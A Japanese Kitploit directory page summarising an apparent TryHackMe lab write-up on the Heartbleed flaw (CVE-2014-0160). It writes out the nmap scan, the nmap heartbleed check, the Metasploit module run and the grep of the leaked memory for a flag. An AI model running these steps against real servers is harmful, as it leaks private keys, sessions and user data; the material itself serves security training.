Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — このプロジェクトの目的は、リモートホストに対してHeartbleed脆弱性(CVE-2014-0160)の評価、その存在の確認、そしてTLSプロトコルを介してサーバーメモリから潜在的に機密性の高い情報を抽出するための悪用を行うことでした。 | Kitploit
ツール/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
メモリフォレンジック脆弱性分析エクスプロイト情報収集ペネトレーションテスト学習と教育
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

このプロジェクトの目的は、リモートホストに対してHeartbleed脆弱性(CVE-2014-0160)の評価、その存在の確認、そしてTLSプロトコルを介してサーバーメモリから潜在的に機密性の高い情報を抽出するための悪用を行うことでした。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
61年前未レビュー

目的

このプロジェクトの目的は、リモートホストのHeartbleed脆弱性(CVE-2014-0160)を評価し、その存在を確認し、TLSプロトコルを介してサーバーメモリから潜在的に機密性の高い情報を抽出するために悪用することでした。

実行

  1. オープンサービスの特定(Nmap)

    root@kitploit:~
    nmap -sC -sV 52.215.184.158
    

    結果:

    root@kitploit:~
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.4
    111/tcp open  rpcbind  2-4
    443/tcp open  ssl/http nginx 1.15.7
    
    | ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
    | Not valid before: 2019-02-16T10:41:14
    | Not valid after:  2020-02-16T10:41:14
    

    TLS証明書は自己署名で期限切れでした。このことから、OpenSSLのバージョンが古い可能性が疑われました。ターゲットポート: 443。

  2. Heartbleed脆弱性の確認(Nmapスクリプト)

    root@kitploit:~
    nmap -p 443 --script ssl-heartbleed 52.215.184.158
    

    結果:

    root@kitploit:~
    | ssl-heartbleed:
    |   VULNERABLE:
    |     OpenSSL 1.0.1 is vulnerable to Heartbleed
    |     State: VULNERABLE
    |     Risk factor: High
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
    

    ターゲットはHeartbleedに対して脆弱であることが確認されました。

  3. 悪用(Metasploit Framework)

    root@kitploit:~
    msfconsole
    use auxiliary/scanner/ssl/openssl_heartbleed
    set RHOSTS 52.215.184.158
    run
    

    結果:

    root@kitploit:~
    [+] Heartbeat response with leak, 44883 bytes
    [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
    

    メモリのダンプに成功し、分析のためにローカルに保存されました。

  4. メモリダンプの分析

    root@kitploit:~
    strings openssl.heartble_152689.bin | grep -i "THM{"
    

    結果:

    root@kitploit:~
    user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}
    

    アプリケーションフラグを含む機密データがTLSメモリから正常に抽出されました。これは、この脆弱性が実際に悪用されて機密情報が漏洩する可能性があることを確認しています。

結論

リモートサーバー上でCVE-2014-0160を正常に特定し悪用しました。そのプロセスは以下の通りです:

  • nmapを使用した脆弱性の検出
  • Metasploitを使用した脆弱性の悪用
  • メモリからのリアルタイムユーザー送信データ(フラグTHM{sSl-Is-BaD}を含む)の抽出

ビジネスへの影響

公開されたシステムにHeartbleedが存在することは、重大なリスクをもたらします:

  • TLS秘密鍵の潜在的漏洩
  • セッションハイジャック
  • ユーザー名、メールアドレス、機密性の高いユーザー入力の露出
ツールをダウンロード